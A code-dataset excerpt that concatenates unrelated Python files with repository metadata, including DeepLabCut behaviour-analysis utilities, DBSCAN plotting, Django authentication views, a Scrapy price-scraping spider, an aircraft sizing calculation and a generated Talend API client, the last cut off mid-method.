return FechasValidas(tipoI, ctrlFechaI[0].GetValue(), ctrlFechaI[1].GetValue(), ctrlFechaI[2].GetValue(),
tipoF, ctrlFechaF[0].GetValue(), ctrlFechaF[1].GetValue(), ctrlFechaF[2].GetValue(), status)
| [
"adolfo@adlap.(none)"
] | adolfo@adlap.(none) |
57fd18f5e0ee538bd2e8ef81cf834062ab1a26e0 | a19f698185b1700183189d0f1a543f24897b7a51 | /b_utils.py | f09030547ec46ab3d16937bd5bc25d849efb6a31 | [] | no_license | Loken85/behavioural_classification | c5a72f02b5aeff9213e5226cd6a079427f265b2d | 222e734432318bfd44273d21311395ebc4c7f96d | refs/heads/master | 2022-12-10T18:33:53.836142 | 2020-09-07T05:12:13 | 2020-09-07T05:12:13 | 293,425,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,676 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 9 14:48:26 2019
@author: adria
Utilities for automated behavioural state tracking with deeplabcut input
"""
import pandas
import numpy as np
import scipy.io as sio
import matplotlib.pyplot as plt
from matplotlib.animation import FFMpegWriter
# Turns a dataframe into a dictionary of numpy arrays
# one (length X 3) array for each part
def frame_to_darray(data):
darray = {}
for feature in list(data.T.index.get_level_values(0)):
darray[feature] = data[feature].to_numpy()
return darray
# saves a .mat file for use in matlab. Takes in a dataframe, saves as a
# struct containing a set of numpy arrays
# Currently saves to PWD, TODO: set the filepath dynamically
def expdf_to_matlab(data):
arry = frame_to_darray(data)
sio.savemat('data_mat.mat', {'data': arry})
# same as above, but takes in dict or numpy array
# could be combined with a type query...but whatever
def expnp_to_matlab(data):
sio.savemat('data_mat.mat', {'data': data})
# create a raw projections dataframe. extracts just x and y positions for features
# in feats list
def create_raw_projections(data,feats):
data = data.T
data = data.sort_index()
rproj = data.loc[(feats,('x','y')),:]
rproj = rproj.T
return rproj
# aligns the projections to a selected feature. Selected feature positions will
# be all zeros
def align_projections2D(rproj,a_ft,dim):
aproj = rproj.copy()
# assemble the full feature lable
feature = a_ft + str(dim)
aproj = aproj.subtract(aproj[feature], level=1)
return aproj
# redundant
def align_projections3D(rproj,a_ft,n_ft):
return aproj
# plots the wave aplitudes of a single feature projected into wavelet space
# TODO: add figure name and axes labels
def plot_wamps(scalo,freqs,name, figs_per_row=5):
# number of subplots
num_plts = np.size(scalo,0)
# number of rows
n_rows = np.ceil(num_plts/figs_per_row)
n_rows = n_rows.astype(int)
# create suplots. set x and y axes to be shared, and set spacing
#fig, axs = plt.subplots(n_rows,figs_per_row,sharex=True,sharey=True,gridspec_kw={'hspace': 0,'wspace' : 0})
# version without shared axis
fig, axs = plt.subplots(n_rows,figs_per_row,gridspec_kw={'hspace': 0,'wspace' : 0})
fig.suptitle(name)
# only use outer axes labels
for ax in axs.flat:
ax.label_outer()
for r in range(0,n_rows):
for n in range(0,figs_per_row):
curr = r*figs_per_row + n
if curr<num_plts:
axs[r,n].plot(scalo[curr,:])
else:
break
# generates and plots a graphical object showing the current frame location in the
# clustered reduced dimensionality space
def plot_curr_cluster(t_out, labels, frame, xi, yi):
# create figure
fig, ax = plt.subplots()
# plot the clusters
plt.pcolormesh(xi, yi, labels)
# plot location of current frame (x, y reversed because t_out is transposed)
y, x = t_out[frame]
plt.scatter(x, y, s=10, c='red', marker='+')
plt.show()
# generates and saves a movie of the t-sne space locations for each frame
def cluster_anim(t_out, labels, xi, yi, fps, start_f = 0, end_f = 1000):
metadata = dict(title="T-sne Space Plot", artist="matplotlib", comment="Movie of t-sne space locations for each frame")
writer = FFMpegWriter(fps=fps, metadata=metadata)
fig, ax = plt.subplots()
#plt.xlim(np.min(xi)-5,np.max(xi)+5)
#plt.ylim(np.min(yi)-5,np.max(yi)+5)
#frames = np.size(t_out, 0)
frames = end_f-start_f
with writer.saving(fig, "location_plot.mp4", frames):
for i in range(start_f,end_f):
plt.pcolormesh(xi, yi, labels)
ax.autoscale(False)
y, x = t_out[i]
plt.scatter(x,y,s=10, c='red', marker='+')
writer.grab_frame()
# helper function for finding the index of the nearest value in an array
# note: this will be slow on large arrays
def find_nearest_index(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx
def plot_ethogram(l_frames):
#max_l = np.max(l_frames)
frames = np.size(l_frames,0)
#ys = range(0,max_l)
xs = range(0, frames)
fig,ax = plt.subplots()
plt.scatter(xs, l_frames, c=l_frames, s=10, cmap='jet')
plt.show()
# count number of occurances of labels in label array
def count_labels(l_array):
labels, counts = np.unique(l_array, return_counts=True)
return labels, counts
# count consecutive occurances of labels in label array
def count_consecutive_labels(l_array):
l_array = l_array.astype(int)
counts_list = []
for i in range(0,np.max(l_array)):
bool_arr = l_array==i
count = np.diff(np.where(np.concatenate(([bool_arr[0]],bool_arr[:-1] != bool_arr[1:], [True])))[0])[::2]
counts_list.append(count)
return counts_list
# trim consecutive count arrays to discard short "behaviours"
def trim_counts(counts_list,threshold=5):
trim_counts = []
for count in counts_list:
count = np.sort(count)
inds = np.where(count>=threshold)
trim = count[inds]
trim_counts.append(trim)
return trim_counts
# plot a set of counts as histograms
def plot_label_counts(counts_list, plots_per_row=3, name='Label Counts',color='blue'):
max_count = 0
for count in counts_list:
if count.any():
curr_max = np.max(count)
if curr_max > max_count:
max_count = curr_max
num_plots = len(counts_list)
n_rows = np.ceil(num_plots/plots_per_row)
n_rows = n_rows.astype(int)
bins = range(0,max_count+1)
fig, axs = plt.subplots(n_rows,plots_per_row,gridspec_kw={'hspace': 0,'wspace' : 0})
fig.suptitle(name)
# only use outer axes labels
for ax in axs.flat:
ax.label_outer()
for r in range(0,n_rows):
for n in range(0,plots_per_row):
curr = r*plots_per_row + n
if curr<num_plots:
axs[r,n].hist(counts_list[curr],bins=bins,color=color)
else:
break
| [
"[email protected]"
] | |
eeafb0a33b32e58aaead1a0011773f833e20579c | 9628ef262c61ede2c7490920681c063bf1682ea7 | /db_clustering/plots.py | a7ca9927c58f6a4b64e393413f351fc755dc68f5 | [] | no_license | schnappv/density-based-clustering | 6c15457c25c101340acf137f4483527b5b01444f | 1ad542b5d7789da782f2b9771d837a64adaee674 | refs/heads/master | 2023-07-27T00:20:52.464045 | 2022-06-28T14:37:44 | 2022-06-28T14:37:44 | 235,692,188 | 0 | 1 | null | 2023-07-06T21:49:52 | 2020-01-23T00:00:40 | Jupyter Notebook | UTF-8 | Python | false | false | 3,472 | py | import logging
from typing import Optional, List
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from matplotlib.ticker import MaxNLocator
from pandas.plotting import register_matplotlib_converters
from db_clustering.base_dbscan import BaseDBSCAN
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def plot_noise(
dbscan_obj: BaseDBSCAN,
title: Optional[str] = None,
x_label: Optional[str] = None,
y_label: Optional[str] = None,
):
"""
Plots the data and circles the points that are determined as outliers or
anomalies
Args:
dbscan_obj: A fitted dbscan object
x_label: a label for the x axis
y_label: a label for the y axis
Returns:
fig, ax
"""
outlier_x, outlier_y = dbscan_obj.outlier_report()
fig, ax = _plot_params(title, x_label, y_label)
plt.scatter(dbscan_obj.obs_x, dbscan_obj.obs_y, color="b", marker="x")
plt.scatter(outlier_x, outlier_y, s=200, facecolors="none", edgecolors="r")
plt.legend(["Observed", "Detected Noise"])
return fig, ax
def plot_clusters(
dbscan_obj: BaseDBSCAN,
title: Optional[str] = None,
x_label: Optional[str] = None,
y_label: Optional[str] = None,
colors: Optional[List[str]] = None,
):
"""
Plots the data and circles the different clusters and noise points
Args:
dbscan_obj: A fitted dbscan object
x_label: a label for the x axis
y_label: a label for the y axis
colors: a list of strings representing colors to represent each cluster
Returns:
fig, ax
"""
clusters = dbscan_obj.detect_clusters()
outlier_x, outlier_y = dbscan_obj.outlier_report()
n_clusters_ = len(set(clusters)) - (1 if -1 in clusters else 0)
fig, ax = _plot_params(title, x_label, y_label)
plt.scatter(dbscan_obj.obs_x, dbscan_obj.obs_y, color="k", marker="x")
if colors is None:
colors = ["b", "g", "orange", "purple", "gold"]
for i in range(n_clusters_):
ilocs = np.where(clusters == i)
cluster_i_x = dbscan_obj.obs_x[ilocs]
cluster_i_y = dbscan_obj.obs_y[ilocs]
plt.scatter(
cluster_i_x,
cluster_i_y,
s=200,
facecolors="none",
edgecolors=colors[i],
)
plt.scatter(outlier_x, outlier_y, s=200, facecolors="none", edgecolors="r")
labels = ["Cluster {}".format(str(i + 1)) for i in range(n_clusters_)]
labels = ["Observed"] + labels + ["Detected Noise"]
plt.legend(labels)
return fig, ax
def _plot_params(title: str, x_label: str, y_label: str):
"""
Establishes parameters for the plots to all be consistent
Args:
title: a title for the plot
x_label: a label for the x axis
y_label: a label for the y axis
Returns:
fig, ax
"""
sns.set_style("white")
register_matplotlib_converters()
fig, ax = plt.subplots(figsize=(10, 5))
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
plt.tick_params(bottom=True, left=True, labelleft=True, labelbottom=True)
if x_label is not None:
plt.xlabel(x_label, fontsize=15, color="k")
if y_label is not None:
plt.ylabel(y_label, fontsize=15, color="k")
if title is not None:
plt.title(title, fontsize=20, color="k")
return fig, ax
| [
"[email protected]"
] | |
e1266db15e249a1e84da1b930047cfc7169dce2e | b29f16ffd36eb64d98a0008e64c582d7c23697ea | /Account/views.py | e561deb9663b8ddba4ae43b2f19dc1c5d71d2663 | [] | no_license | minhvu2899/B0EC | 019bb744857aa66ee50c4b9ca0f2cb9d097180b9 | 2653653f68d2ac4a8f911214b9a4a3f02f842219 | refs/heads/main | 2023-06-04T06:41:11.767476 | 2021-06-23T15:07:39 | 2021-06-23T15:07:39 | 379,642,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | from django.http.response import HttpResponse
from django.shortcuts import redirect, render
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout as logouts
from django.contrib.auth import login as logins
from django.contrib.auth import authenticate
from django.contrib.auth import get_user_model
from Account.models import SignUpForm
from user.models import CustomerUser
# Create your views here.
def index(request):
if not request.user.is_authenticated:
return redirect("account:login")
return render(request,"homepage/home-page.html",{"user":request.user})
def register(request):
User = get_user_model()
print(User)
if request.method=='POST':
form=SignUpForm(request.POST)
if form.is_valid():
form.save()
return redirect("account:login")
else:
form =SignUpForm()
return render(request,"Account/register.html",{"form":form})
def login(request):
if request.method=='POST':
form=AuthenticationForm(data=request.POST)
if form.is_valid():
user = authenticate(username=request.POST.get('username'),password=request.POST.get('password'))
if user is None:
return HttpResponse("Tai khoan khong ton tai")
logins(request,user)
return redirect('core:index')
else:
form=AuthenticationForm()
return render(request,"Account/login.html",{"form":form})
def logout(request):
logouts(request)
return redirect('/') | [
"[email protected]"
] | |
8308d8158367a20c31afa31998a2f7eb48b3601e | faaf763f55bade3b73a320d841fa4cb3a19d1884 | /src/dygie_ent/__init__.py | 48dce1901649ff8a80ca4be6df1cfbf485fad62f | [] | no_license | jeremytanjianle/few-shot-active-learner | 57bb552871d436890c9c088b42aa14a8ca979608 | 3bf1b1ccdccfe43747d5de5cbaa550b3c5d85f37 | refs/heads/main | 2023-04-26T16:14:00.572067 | 2021-05-26T14:10:58 | 2021-05-26T14:10:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | from .model import Dygie_Ent | [
"[email protected]"
] | |
4912c9aa0169725dec897c3ad6b60c8d226faa63 | 8f6119f0e31b49b45a500435f509e76718a6d34f | /venv/Scripts/pip3-script.py | 45f2ff25911187d97095b29c72a85b088dbafee3 | [] | no_license | reyhanzo/PROGJAR_05111740000154 | ff4f4d7b519be6b24b4538b303d8883174b1a8fa | 77a6fde75f8f8700725fc52c4c80b9aa88ac4d53 | refs/heads/master | 2021-01-02T03:02:11.379409 | 2020-05-15T15:53:28 | 2020-05-15T15:53:28 | 239,463,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | #!C:\Users\LENOVO\Documents\GitHub\PROGJAR_05111740000154\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
3242d0126d4fef0df4997284cec8c9188b7e3d1f | 3835677a1e44a7c9de8bc1c0fba7df94caaf4b16 | /app/modelo/migrations/0005_auto_20190112_2117.py | 53c98283d8eb26883207b4b28664b83a77d0fd26 | [] | no_license | JonnathanE/cooperativa | cf3f42c112b05120599b261460f88fc6ee7a32bf | 9a7c92eb51b7f91c348f38919772e2c83f993d9c | refs/heads/master | 2020-04-17T04:51:52.799529 | 2019-01-17T15:52:33 | 2019-01-17T15:52:33 | 166,249,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # Generated by Django 2.1.4 on 2019-01-12 21:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('modelo', '0004_auto_20190109_0413'),
]
operations = [
migrations.AlterField(
model_name='bancavirtual',
name='numeroCuentaDestino',
field=models.CharField(max_length=20),
),
]
| [
"[email protected]"
] | |
b44afe41d7c0420888c16fb1296fb8feeb61c675 | 1d4fdcc3ad5a18841da84c9dc9a1838aa4129d40 | /For First Design/aircracft.py | f0c36bce1c5d43a04a18033b2796cff14d929cec | [] | no_license | aneax/fixed_wing | fca20b8d80754ff07d39403d9eefed656ef92129 | 0f56302113f329ecd1c417b4ef9f549590d1bf2d | refs/heads/master | 2021-10-28T03:24:33.212703 | 2019-04-21T08:51:32 | 2019-04-21T08:51:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,587 | py | import math
import atmosphere
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
f=open('output.txt','w')
n=5
stall_margin=7 #m/s
#def round_value(func):
# return round(func,n)
##%% Mission Requirements
#f.write("Mission Requirements\n\n")
#endurance=0 #min
#f_range=30 #km
#stall_margin=7 #m/s
#min_airspeed=10 #m/s
#
#f.write('Endurance:{} min\t\tFlight Range:{} km\t\tStall Margin:{} m/s\t\tMinimum Airspeed:{} m\s\n '.format(endurance,f_range,stall_margin,min_airspeed))
#%% Payload Requirements
payload_mass=1 #kg
payload_power=0 #W
f.write('Pay Load Requirements\nPayload Mass:{} kg\t\tPayload Power Requirements:{} Watt\n'.format(payload_mass,payload_power))
#%% Aircraft
airframe_mass=1.952 # kg
avionics_power=0 #W
fuselage_drag_coeff=0.03
zero_lift_drag_coeff=0.02
f.write('\nAircraft Requirements\nAirframe Mass:{} kg\t\tAvionics Power:{} Watt\t\tFuselage Drag Coefficient:{} \t\tZero Lift Coefficient "C_Do":{}\n'.format(airframe_mass,avionics_power,fuselage_drag_coeff,zero_lift_drag_coeff))
#%% Cruise Speed
cruise_speed=25 #m/s
cruise_altitude=2500 #m
#%% Environment
air_density,air_temperature=atmosphere.densityGradient(cruise_altitude)
#air_density=1.11
#print('Air Density:{} kg/m3'.format(air_density))
f.write('\nCruise Data\nCruise Speed:{} m/s\t\tCruise Altitude:{} m\t\tAir Density:{} kg/m3\t\t\nAir Temperture:{} K\n'.format(cruise_speed,cruise_altitude,round(air_density,n),round(air_temperature,n)))
#%% Propulsion and Batteries Inputs
battery_capacity=5300 #mah
battery_mass_single=.512 #kg
cell_volatage=4.2 #V
cell_in_series=4
no_of_batteries=2
total_capacity_used=90 # %
overall_efficiency= 100# %
f.write('\nBattery and Propulsion Inputs\nBattery Capacity:{} mAh\t\tSingle Battery Mass:{} kg\t\tCell Voltage:{} V\t\tCell in Series:{}\nNumber of Battery:{}\t\t\t\tTotal Capacity Used:{} %\t\t\tOverall Propulsive Efficiency:{}\n'.format(battery_capacity,battery_mass_single,cell_volatage,cell_in_series,no_of_batteries,total_capacity_used,overall_efficiency))
#%% WIng Inputs
wing_loading= 12.5 #%%kg/m2
aspect_ratio=8
taper_ratio=0.8
oswald_efficiency=1.78*(1-0.045*np.power(aspect_ratio,0.68))-0.64
max_lift_coefficient=1.5
f.write('\nWing Inputs\nWing Loading:{} kg/m2\t\tAspect Ratio:{}\t\tTaper Ratio:{}\t\tOswald Efficiency "e":{}\nMax Lift Coefficient "c_Lmax":{}\n'.format(wing_loading,aspect_ratio,taper_ratio,oswald_efficiency,max_lift_coefficient))
#%% Calculations
total_battery_capacity=no_of_batteries*battery_capacity
#print('Total Battery Capacity:{} mAh'.format(total_battery_capacity))
voltage=cell_volatage*cell_in_series
#print('Total Voltage:{} V:'.format(voltage))
battery_mass=no_of_batteries*battery_mass_single
#battery_mass=voltage*battery_capacity/energy_density/1000*no_of_batteries
#print('Battery mass:',battery_mass)
#total_mass=payload_mass+airframe_mass+battery_mass
total_mass=3.5
#print('Total Mass "m":',total_mass)
f.write('\nBattery Calculations\nTotal Battery Capacity:{} mAh\t\tTotal Voltage:{} V\t\tTotal Battery Mass:{} kg\n'.format(total_battery_capacity,voltage,battery_mass))
f.write('\nTotal Aircraft Mass:{} kg\n'.format(total_mass))
#%% Main Wing
wing_area=total_mass/wing_loading
b=(aspect_ratio*wing_area)**0.5/2
#print('Wing Area "S":',wing_area)
#print('Semi_span "b":',b)
root_chord=(2*wing_area)/(2*b*(1+taper_ratio))
#print('root_chord:',root_chord)
tip_chord=taper_ratio*root_chord
#print('Tip Chord:',tip_chord)
avg_chord=(tip_chord+root_chord)/2
#print('Average Chord:',avg_chord)
f.write('\nWing Calculations\nWing Area:{} m2\t\tSpan:{} m\t\tSemi-Span:{} m\nRoot Chord:{} m\t\tTip Chord:{} m\n'.format(round(wing_area,n),round(2*b,n),round(b,n),round(root_chord,n),round(tip_chord,n)))
#%%
mass_fraction=(battery_mass+payload_mass)/total_mass
#print('Mass Fraction:',mass_fraction)
f.write('Mass Fraction:{} %\n'.format(round(mass_fraction,n)*100))
k=1/(math.pi*oswald_efficiency*aspect_ratio)
min_drag_airspeed=(2*total_mass*9.81/(air_density*wing_area))**0.5*(k/(zero_lift_drag_coeff+fuselage_drag_coeff))**0.25
#print('Minimum Drag Speed "Vm":',min_drag_airspeed)
min_power_airspeed=min_drag_airspeed*1/(3)**(1/4)
#print('Minimum Power Speed "Vmp":',min_power_airspeed)
min_air_stallspeed=((2*total_mass*9.81)/(air_density*wing_area*max_lift_coefficient))**0.5
#print('Stall Speed "Vmin":',min_air_stallspeed)
stall_margin_calculated=cruise_speed-min_air_stallspeed
f.write('\nSpeed Calculations\nMinimum Drag Speed:{} m/s\t\tMinimum Power Speed:{} m/s\t\tStall Speed:{} m/s\n'.format(round(min_drag_airspeed,n),round(min_power_airspeed,n),round(min_air_stallspeed,n)))
c=0
#%% Lift Drag Calculation
def lift_drag_propulsion(velocity,c):
c_L=((2*total_mass*9.81)/(air_density*wing_area*velocity**2))
#print('Lift Coefficient "cL":',c_L)
c_D=zero_lift_drag_coeff+fuselage_drag_coeff+c_L**2*k
#print('Drag Coefficient "c_D":',c_D)
drag=0.5*c_D*wing_area*air_density*velocity**2
#print('Drag in newton":',drag)
lift=drag*c_L/c_D
#print('Lift in newton:',lift)
lift_to_drag=c_L/c_D
#print("Lift/Drag:",lift_to_drag)
propulsive_power_required=drag*velocity/(overall_efficiency/100)
i_prop=propulsive_power_required/voltage
#print('Current Required for propeller:',i_prop)
#%% Current Required
i_avio=avionics_power/voltage
i_pay=payload_power/voltage
total_current_required=i_prop+i_avio+i_pay
time_of_flight=(total_battery_capacity/1000)*(total_capacity_used/100)/(i_prop+i_pay+i_avio)
#print('Time of flight in minutes:',time_of_flight*60)
total_range=time_of_flight*velocity
#print('Total_range in km:',total_range*3600/1000)
if c==0:
print('Propulsive Power Required',propulsive_power_required)
f.write('\nLift Drag Calculations\nCoefficient of Lift "c_L":{}\t\tCoefficient of Drag "c_D":{}\t\tDrag:{} N\nLift:{} N\t\t\t\t\t\tLift to Drag Ratio "L/D":{}\n'.format(round(c_L,n),round(c_D,n),round(drag,n),round(lift,n),round(lift_to_drag,n)))
f.write('\nStall Margin:{} m/s\t\tPropulsive Power Required:{} Watt\n'.format(round(stall_margin_calculated,n),round(propulsive_power_required,n)))
f.write('\nCruise Propeller Current Requirement:{} A\t\tAvionics Current Requirement:{} A\nPayload Current Requirement:{}\t\t\t\t\t\tTotal Current Requirement:{} A\n'.format(round(i_prop,n),round(i_avio,n),round(i_pay,n),round(total_current_required,n)))
f.write('\nTime of Flight:{} min\t\tTotal Range:{} km\n'.format(round(time_of_flight*60,n),round(total_range*3600/1000,n)))
c=c+1
return propulsive_power_required,time_of_flight,total_range,drag,lift
propulsive_power_required,time_of_flight,total_range,drag,lift=lift_drag_propulsion(cruise_speed,c)
#print('Calculated Stall Margin:',stall_margin_calculated)
#%% Requriement Fulfilled
#range_re=f_range-total_range*3600/1000
#endurance_re=endurance-time_of_flight
#f.write('\n\nRange Requirement Fulfillment:{}\n'.format(range_re))
#%% Propeller Design
dia=0.254 #m
import propeller_design as pd
power,v_1,effi=pd.propeller_design(drag,cruise_speed,cruise_altitude,dia)
f.write('\n\nPropeller Design\nPropeller Shaft Power:{} Watt\t\tPropeller Outlet Velocity:{} m\s\t\tEfficieny:{}\n'.format(round(power,n),round(v_1,n),round(effi,n)))
#%%
f.close()
#%% Plot Generation
f1=open('output_plot.txt','w')
for v in range(6,41):
propulsive_power_required,time_of_flight,total_range,drag,lift=lift_drag_propulsion(v,2)
f1.write('{}\t{}\t{}\t{}\t{}\t{}\n'.format(v,round(time_of_flight*60,n),round(total_range*3600/1000,n),round(propulsive_power_required,n),round(drag,n),round(lift,n)))
f1.close()
f2=open('output_plot.txt','r')
x=[]
y=[]
z=[]
pr=[]
d=[]
l=[]
for line in f2:
p = line.split()
x.append(float(p[0]))
y.append(float(p[1]))
z.append(float(p[2]))
pr.append(float(p[3]))
d.append(float(p[4]))
l.append(float(p[5]))
plt.figure(1)
plt.plot(1)
plt.plot(cruise_speed*np.ones(2),[1,np.max(y)+50],label='cruise speed')
plt.plot(min_air_stallspeed*np.ones(2),[1,np.max(y)+50],label='min speed')
plt.plot(x,y,label='time of flight "min"')
plt.plot(x,z,label='range "km"')
#
plt.xlabel('Velocity m/s')
plt.ylabel('Flight Time and Range')
plt.legend(bbox_to_anchor=(0.5, 1), loc=2, borderaxespad=0.)
plt.figure(2)
plt.plot(x,pr)
plt.xlabel('Velocity m/s')
plt.ylabel('Propulsive Power Required')
plt.figure(3)
plt.plot(x,d,label='Drag')
plt.plot(x,l,label='Lift')
plt.xlabel('Velocity m/s')
plt.ylabel('Lift Drag "N"')
plt.legend(bbox_to_anchor=(0.5, 1), loc=2, borderaxespad=0.)
#l=np.array(l)
l_d=np.divide(l,d)
plt.figure(4)
plt.plot(x,l_d)
plt.xlabel('Velocity m/s')
plt.ylabel('Lift/Drag')
plt.show()
| [
"[email protected]"
] | |
ab82ba1b699e55a93be8f6d23f9c77bc8b1121a2 | c5370d05e8b07e78bab362c91fbab70f1cbba22a | /FruitFree/spider/yimutian/yimutian/spiders/yimutian_locationchart.py | dd39e68253a57f4b62f9332a9f0ac70d9b06279b | [] | no_license | YihengWang828/FruitFreedom | 21c540a1d049684bc63440f6090034210fabfd45 | 489fd82b754196f7312960bf75c2bc213c4c0e88 | refs/heads/master | 2022-11-11T05:21:15.952454 | 2020-06-27T15:08:34 | 2020-06-27T15:08:34 | 273,426,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,710 | py | import scrapy
import re
import json
from bs4 import BeautifulSoup
from copy import deepcopy
import os
import csv
import time
from yimutian.items import YimutianItem
#from products.items import ProductsItem
class yimutianSpider(scrapy.Spider):
name='yimutian'
allowed_domains = ['hangqing.ymt.com']
def start_requests(self):
headers={
"Referer": "http://hangqing.ymt.com/chandi_8426_0_-1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
}
url='http://hangqing.ymt.com/chandi/'
yield scrapy.Request(url=url,callback=self.parse,headers=headers,dont_filter=True)
def parse(self,res):
#print(res.text)
soup=BeautifulSoup(res.text,'lxml')
wrapper=soup.find(id='purchase_wrapper')
a_shuiguo=wrapper.find_all('a')
#print(a_shuiguo[1])
headers={
#"Referer": "http://hangqing.ymt.com/chandi_8426_0_-1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
}
yield scrapy.Request(url='http://hangqing.ymt.com/common/nav_chandi_'+a_shuiguo[1]['data-id'],callback=self.parse_1,headers=headers,dont_filter=True)
def parse_1(self,res):
soup=BeautifulSoup(res.text,'lxml')
cate_detail_all=soup.find_all(class_=re.compile('cate_detail_con'))
headers={
"Referer": "http://hangqing.ymt.com/chandi_8426_0_-1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
"Cache-Control": "no-cache"
}
as_=[]
for i in range(1,7):
print(3)
cate_detail_one=cate_detail_all[i]
lis=cate_detail_one.find_all('li')
#print(len(lis))
for li in lis:
a=li.find(href=re.compile('http'))
#print(a)
as_.append(a)
print(len(as_))
for a in as_:
item=YimutianItem()
item['name']=a.string
item['data_id']=a['data-id']
item['href']=a['href']
#yield scrapy.Request(item['href'],callback=self.parse_2,meta={"item":deepcopy(item)})
form_data={
"locationId":"0",
"productId":item["data_id"],
"breedId":"0"
}
print(1)
#print(form_data)
yield scrapy.FormRequest(
"http://hangqing.ymt.com/chandi/location_charts",
formdata=form_data,
callback=self.parse_3,
meta=item,
dont_filter=True
)
def parse_3(self,res):
print(2)
items=res.meta
print(items)
item=YimutianItem()
item['name']=items['name']
item['href']=items['href']
item['data_id']=items['data_id']
html_str=json.loads(res.text)
status=html_str['status']
if status==0:
dataList=html_str["data"]["dataList"]
item['title']=html_str["data"]["title"]
item['type_']=0
for data in dataList:
if type(data)==type([]):
item["province_name"]=data[0]
item["province_price"]=data[1]
elif type(data)==type({}):
item["province_name"]=data["name"]
item["province_price"]=data["y"]
yield item
| [
"[email protected]"
] | |
1e1edc52a0391978d201fa29915e76ea3b59a2c1 | 82adfe2b2b6bc3989f8b860513d5ee4b753987e3 | /pytmcapi/swagger_client/api/promotions__executables_api.py | 8d566fd25748ef0010aab5e51e9c5630fa905a1b | [
"Apache-2.0"
] | permissive | mverrilli/tmc-api-clients | 9ffc520a21b791d5047dfd74050af9bd6268b7a5 | 0d2752a4c2f43b19da9714072d03c15dccf2619a | refs/heads/master | 2021-05-17T22:45:38.453946 | 2020-04-06T16:32:40 | 2020-04-06T16:32:40 | 250,986,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,980 | py | # coding: utf-8
"""
Talend Management Console Public API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class PromotionsExecutablesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_executable_details(self, id, **kwargs): # noqa: E501
"""Get Promotion details # noqa: E501
Get Promotion details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executable_details(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: executable ID (required)
:return: PromotionExecutableDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_executable_details_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_executable_details_with_http_info(id, **kwargs) # noqa: E501
return data
def get_executable_details_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Promotion details # noqa: E501
Get Promotion details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executable_details_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: executable ID (required)
:return: PromotionExecutableDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_executable_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_executable_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication'] # noqa: E501
return self.api_client.call_api(
'/executables/promotions/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PromotionExecutableDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_executables_available(self, **kwargs): # noqa: E501
"""Get available Promotions # noqa: E501
Get available Promotions # noqa: E501
